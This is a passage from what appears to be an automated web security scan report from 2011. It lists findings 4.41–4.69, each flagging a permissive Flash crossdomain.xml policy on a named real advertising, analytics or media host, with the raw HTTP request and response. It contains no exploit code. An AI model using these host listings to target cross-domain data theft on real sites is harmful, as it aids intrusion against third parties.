Host: oimg.m.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:07:49 GMT
Server: Omniture DC/2.0.0
xserver: www282
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.41. http://oimg.nbcuni.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://oimg.nbcuni.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: oimg.nbcuni.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:56:45 GMT
Server: Omniture DC/2.0.0
xserver: www78
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.42. http://omni.csc.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://omni.csc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: omni.csc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:57:45 GMT
Server: Omniture DC/2.0.0
xserver: www614
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.43. http://oracle.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://oracle.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: oracle.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:06 GMT
Server: Omniture DC/2.0.0
xserver: www423
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.44. http://oracleglobal.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://oracleglobal.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: oracleglobal.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:27 GMT
Server: Omniture DC/2.0.0
xserver: www93
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.45. http://oracleuniversity.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://oracleuniversity.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: oracleuniversity.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:01:45 GMT
Server: Omniture DC/2.0.0
xserver: www431
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.46. http://p.brilig.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: p.brilig.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:30 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 19 Jul 2011 01:19:04 GMT
ETag: "55fb9-ab-4a861e6c7f200"
Accept-Ranges: bytes
Content-Length: 171
X-Brilig-D: D=74
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>

<cross-domain-policy>

<site-control permitted-cross-domain-policies="master-only"/>

<allow-access-from domain="*"/>

</cross-domain-policy>

4.47. http://pg.links.channelintelligence.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pg.links.channelintelligence.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pg.links.channelintelligence.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Fri, 09 Nov 2007 15:45:10 GMT
ETag: "eb20ee82e722c81:2faa"
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
Date: Tue, 06 Sep 2011 16:45:35 GMT
Content-Length: 206
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />    
</cross-domain-polic
...[SNIP]...

4.48. http://pg.links.origin.channelintelligence.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pg.links.origin.channelintelligence.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pg.links.origin.channelintelligence.com

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/xml
Last-Modified: Fri, 09 Nov 2007 15:45:10 GMT
Accept-Ranges: bytes
ETag: "eb20ee82e722c81:2884"
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:45:38 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />    
</cross-domain-polic
...[SNIP]...

4.49. http://ping.crowdscience.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ping.crowdscience.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ping.crowdscience.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:56 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Last-Modified: Wed, 27 Apr 2011 03:48:25 GMT
ETag: "c3167-e0-4a1de5011d440"
Accept-Ranges: bytes
Content-Length: 224
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
       <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
       <cross-domain-policy>
               <allow-access-from domain="*" secure="false"/>
       
...[SNIP]...

4.50. http://pix04.revsci.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Tue, 06 Sep 2011 16:45:33 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.51. http://pixel.adsafeprotected.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.adsafeprotected.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"202-1313613444000"
Last-Modified: Wed, 17 Aug 2011 20:37:24 GMT
Content-Type: application/xml
Content-Length: 202
Date: Tue, 06 Sep 2011 15:05:41 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

4.52. http://pixel.everesttech.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.everesttech.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.everesttech.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:08:45 GMT
Server: Apache
Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT
ETag: "2051143-cb-49f19eb07d340"
Accept-Ranges: bytes
Content-Length: 203
Keep-Alive: timeout=15, max=999077
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

4.53. http://pixel.fetchback.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.fetchback.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:28 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

4.54. http://pixel.mathtag.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x4 pid 0x7f3a 32570
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

4.55. http://pixel.quantserve.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 07 Sep 2011 14:56:57 GMT
Content-Type: text/xml
Content-Length: 207
Date: Tue, 06 Sep 2011 14:56:57 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

4.56. http://pro.cnbc.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pro.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pro.cnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Server: Microsoft-IIS/7.0
Date: Tue, 06 Sep 2011 15:02:07 GMT
Via: 1.1 C aicache6
Content-Length: 203
X-Aicache-OS: 216.151.182.3:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Tue, 06 Sep 2011 15:03:20 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.57. http://r.casalemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.casalemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:27:27 GMT
ETag: "15690dc-e6-1230c1c0"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Tue, 06 Sep 2011 15:37:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:37:47 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Casale Media -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.58. http://rcv-srv03.inplay.tubemogul.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://rcv-srv03.inplay.tubemogul.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: rcv-srv03.inplay.tubemogul.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tmid=-5675633421699857517

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1313337982000"
Last-Modified: Sun, 14 Aug 2011 16:06:22 GMT
host: rcv-srv03
Content-Type: application/xml
Content-Length: 204
Date: Tue, 06 Sep 2011 16:13:59 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.59. http://receive.inplay.tubemogul.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://receive.inplay.tubemogul.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: receive.inplay.tubemogul.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tmid=-5675633421699857517

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1313337982000"
Last-Modified: Sun, 14 Aug 2011 16:06:22 GMT
host: rcv-srv03
Content-Type: application/xml
Content-Length: 204
Date: Tue, 06 Sep 2011 16:13:01 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.60. http://reviews.gillettevenus.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://reviews.gillettevenus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: reviews.gillettevenus.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml;charset=utf-8
Content-Language: en-US
Date: Tue, 06 Sep 2011 16:45:34 GMT
Content-Length: 230
Connection: close

<?xml version="1.0" encoding="UTF-8"?><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"/><allow-access-from domain="*"/><allow-http-request-headers-from domain="*" heade
...[SNIP]...

4.61. http://s0.2mdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 05 Sep 2011 23:18:10 GMT
Expires: Fri, 02 Sep 2011 23:16:00 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 56400
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.62. http://search.twitter.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: search.twitter.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:12:53 GMT
Server: Apache
Last-Modified: Tue, 25 Jan 2011 18:04:30 GMT
Accept-Ranges: bytes
Content-Length: 206
Cache-Control: max-age=1800
Expires: Tue, 06 Sep 2011 16:42:53 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

4.63. http://secure-us.imrworldwide.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 14:56:57 GMT
Content-Type: text/xml
Content-Length: 268
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
Connection: close
Expires: Tue, 13 Sep 2011 14:56:57 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

4.64. http://services.plymedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.plymedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: services.plymedia.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=15552000
Content-Length: 682
Content-Type: text/xml
Content-Location: http://services.plymedia.com/crossdomain.xml
Last-Modified: Sun, 12 Oct 2008 12:01:36 GMT
Accept-Ranges: bytes
ETag: "d4bdbe46622cc91:69f"
Server: Microsoft-IIS/6.0
Date: Tue, 06 Sep 2011 16:12:57 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.65. http://speed.pointroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:527"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:57:11 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

4.66. http://static.plymedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.plymedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: static.plymedia.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: p2kfOzDCng+L76/JTsga//ruR9goW2HSjGFLQ4hzapeI1gDCQ+kmiJpTbuF2/Np4
x-amz-request-id: E50262CF927C8E0A
Date: Tue, 12 Jul 2011 23:33:42 GMT
Cache-Control: public, max-age=3600, s-maxage=3600
Last-Modified: Wed, 13 May 2009 15:23:00 GMT
ETag: "60a8f758689bdda4e7f5930695eaaee5"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 682
Server: AmazonS3
Age: 2242
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 123b0430d85da58b68cb675acbdd06c268df8e8fd9fca78a071b7f61da95f240a1e6cf1947de972d
Via: 1.0 2ba8d32c0ef1d73da2fcae191d906606.cloudfront.net:11180 (CloudFront), 1.0 146c5c89c7c8fdf6aead7052bd267a9d.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.67. http://static.plymedia.com.s3.amazonaws.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.plymedia.com.s3.amazonaws.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: static.plymedia.com.s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: Pd0L2ovjrp/ISSNethDM0f3pSYm1BIX6qTq2TTDXHH+SL+bp1gPlnN6PYv/OGA5v
x-amz-request-id: C468540F9D630C4D
Date: Tue, 06 Sep 2011 16:13:11 GMT
Cache-Control: public, max-age=3600, s-maxage=3600
Last-Modified: Wed, 13 May 2009 15:23:00 GMT
ETag: "60a8f758689bdda4e7f5930695eaaee5"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 682
Server: AmazonS3

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.68. http://stats.deloitte.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.deloitte.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: stats.deloitte.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:57:01 GMT
Server: Omniture DC/2.0.0
xserver: www88
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.69. http://statse.webtrendslive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: statse.webtrendslive.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:8bf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:45:45 GMT
Connection: close

